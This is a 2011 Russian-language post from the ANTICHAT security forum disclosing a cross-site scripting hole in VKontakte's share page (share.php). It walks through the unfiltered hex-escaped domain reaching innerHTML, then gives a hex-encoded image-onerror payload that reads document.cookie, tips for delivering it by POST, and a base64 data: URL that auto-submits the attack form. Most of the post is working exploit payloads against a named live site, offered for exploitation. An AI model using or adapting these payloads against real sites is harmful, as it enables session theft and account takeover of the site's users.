vkontakte.ru/vk.com XSS — ANTICHAT Forum

01.11.2011, 22:38

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Наверное многие из вас знают о возможности "поделиться ссылкой" на сайт в различных соц.сетях. (

)

Вконтакте это делается следующим запросом:

http://vkontakte.ru/share.php?url=http://site.com/path/filename.ext

В исходнике страницы:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]window[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]shareUrl[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://site.com/path/filename.ext'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]window[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]shareDomain[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'site.com'[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]

Попробуем такую ссылку:

http://vkontakte.ru/share.php?url=http://site.com\x22/path\x22/filename\x22.ext\x22

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]window[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]shareUrl[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://site.com\x22/path\x22/filename\x22.ext\x22'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]window[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]shareDomain[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'site.com\x22'[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]

Обратный слэш в домене передаваемой ссылки не фильтруется. Значит можно передать в shareUrl и shareDomain любой текст.

Смотрим, что происходит с этими переменными дальше в коде страницы:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]ge[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'parse_url'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]shareUrl[/COLOR][COLOR="#007700"];

...

if ([/COLOR][COLOR="#0000BB"]window[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]shareDomain[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]ge[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'share_domain'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]innerHTML[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]shareDomain[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]hide[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'share_domain'[/COLOR][COLOR="#007700"]);

}

...

..

[/COLOR][/COLOR]

(функция ge() используется вконтакте, как псевдоним document.getElementById())

value в теге input ничего не даст, зато innerHTML позволяет вставить в страницу произвольный код.

XSS:

http://vkontakte.ru/share.php?url=http://site.com\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x78\x22\x 6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x61\x6C\x65\x72 \x74\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x 6F\x6F\x6B\x69\x65\x29\x3B\x22\x77\x69\x64\x74\x68 \x3D\x30\x3E

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

Запрос работает через POST, желательно использовать эту возможность при эксплуатации XSS.

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR]

или

Код:

Code:
data:text/html;base64,PGJvZHkgb25sb2FkPSJteXZrLnN1Ym1pdCgpOyI%2BPGZvcm0gaWQ9Im15dmsiYWN0aW9uPSJodHRwOi8vdmtvbnRha3RlLnJ1L3NoYXJlLnBocCJtZXRob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0Im5hbWU9InVybCJ2YWx1ZT0iaHR0cDovL3NpdGUuY29tXHgzQ1x4NjlceDZEXHg2N1x4MjBceDczXHg3Mlx4NjNceDNEXHgyMlx4NzhceDIyXHg2Rlx4NkVceDY1XHg3Mlx4NzJceDZGXHg3Mlx4M0RceDIyXHg2MVx4NkNceDY1XHg3Mlx4NzRceDI4XHg2NFx4NkZceDYzXHg3NVx4NkRceDY1XHg2RVx4NzRceDJFXHg2M1x4NkZceDZGXHg2Qlx4NjlceDY1XHgyOVx4M0JceDIyXHg3N1x4NjlceDY0XHg3NFx4NjhceDNEXHgzMFx4M0UiLz48L2Zvcm0%2BPC9ib2R5Pg==

p.s.: работает одинаково для vkontakte.ru и vk.com

ANTICHAT — форум по информационной безопасности, OSINT и технологиям